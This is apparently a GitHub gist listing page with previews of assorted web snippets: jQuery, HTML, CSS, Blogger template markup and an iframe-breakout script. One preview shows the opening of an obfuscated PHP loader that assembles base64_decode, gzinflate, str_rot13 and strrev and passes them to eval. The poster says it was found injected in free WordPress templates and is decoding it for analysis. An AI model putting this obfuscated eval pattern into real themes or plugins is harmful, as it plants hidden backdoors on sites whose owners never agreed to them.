This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
jQuery("fieldset #edit-submit").hide(); jQuery("input[name='op']").css("float","right").val("Next"); | |
jQuery("a[href='#node_rent_form_group_photo']").click(function(e){ | |
jQuery("input[name='op']").val("Save"); | |
}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8" /> | |
<title>Anasailuj Boutique Collections</title> | |
<!-- CSS --> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Found this Injection CODE on bunch of generic FREE WordPress templates websites. | |
// spend my entire evening decoding this nasty 22 level depth crap. | |
/* | |
-------------------------- | |
RAW ENCODED SOURCE | |
-------------------------- | |
*/ | |
$dcOn='e';$LpAbD='o';$KOqBWr='b';$ZNkpo='4';$Auavi='e';$NBBO='s';$HvRR='_';$ozTLC='c';$KjYs='a';$IZyAtI='d';$OEXDROO='e';$lEzLwxc='6';$jZhLA='d';$wrJASXrZ=$KOqBWr.$KjYs.$NBBO.$dcOn.$lEzLwxc.$ZNkpo.$HvRR.$jZhLA.$OEXDROO.$ozTLC.$LpAbD.$IZyAtI.$Auavi;$gYnppzc='i';$LrOcHrc='l';$KbMW='t';$OXJMkZ='a';$TqqCaWx='z';$eNUUQBc='g';$TEmQca='e';$lCgIJX='n';$OLtJB='f';$MvMzwwhQ=$eNUUQBc.$TqqCaWx.$gYnppzc.$lCgIJX.$OLtJB.$LrOcHrc.$OXJMkZ.$KbMW.$TEmQca;$hcNNVTj='o';$FTfwWgY='t';$JoZtpMp='s';$KxnldyK='_';$wtGvM='r';$JxSce='3';$KNcYZf='1';$ZhkQjUc='t';$QbKmw='r';$ybxBFlyo=$JoZtpMp.$FTfwWgY.$QbKmw.$KxnldyK.$wtGvM.$hcNNVTj.$ZhkQjUc.$KNcYZf.$JxSce;$StwBkh='v';$pxIA='e';$JcdNwmi='r';$THkok='s';$hqQKeYE='r';$KJQLIAS='t';$VhYCNiUW=$THkok.$KJQLIAS.$JcdNwmi.$hqQKeYE.$pxIA.$StwBkh;eval($MvMzwwhQ($wrJASXrZ($y |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/*** | |
Safely break out of an iframe for blogspot.com | |
@author Nuar H. Noah | |
*/ | |
var myblog = { hostname: top.location.hostname, whitelist: Array() } | |
myblog.breakfree = function(){ | |
if (top.location != self.location) { | |
var curDomain = this.hostname.split('.')[1]; | |
this.whitelist['blogspot'] = 1; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
body | |
{ font:12px/1.5em Arial,Helvetica,Sans-serif; | |
color:#555; | |
background:#e9e9e9 url(http://1.bp.blogspot.com/-CFDJn4O_Zo0/TjtE-oRXNAI/AAAAAAAAAVI/5khH-2-zYzs/s000/bg-grid.png) repeat; } | |
h1,h2,h3,h4,h5,h6 | |
{ margin:0; | |
color:#555; | |
font-family:sans-serif; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if (top.location!= self.location){ top.location = self.location.href } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<body expr:class='"loading, pagetype-" + data:blog.pageType + data:blog.mobileClass'> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<b:if cond='data:blog.url == data:blog.homepageUrl'> | |
<title><data:blog.title/> - blog description </title> | |
<b:else/> | |
<b:if cond='data:blog.pageType == "index"'> | |
<title><data:blog.pageName/> - <data:blog.title/> - blog description </title> | |
<b:else/> | |
<b:if cond='data:blog.pageType == "static_page"'> | |
<title><data:blog.pageName/> - <data:blog.title/></title> | |
<b:else/> | |
<b:if cond='data:blog.pageType == "item"'> |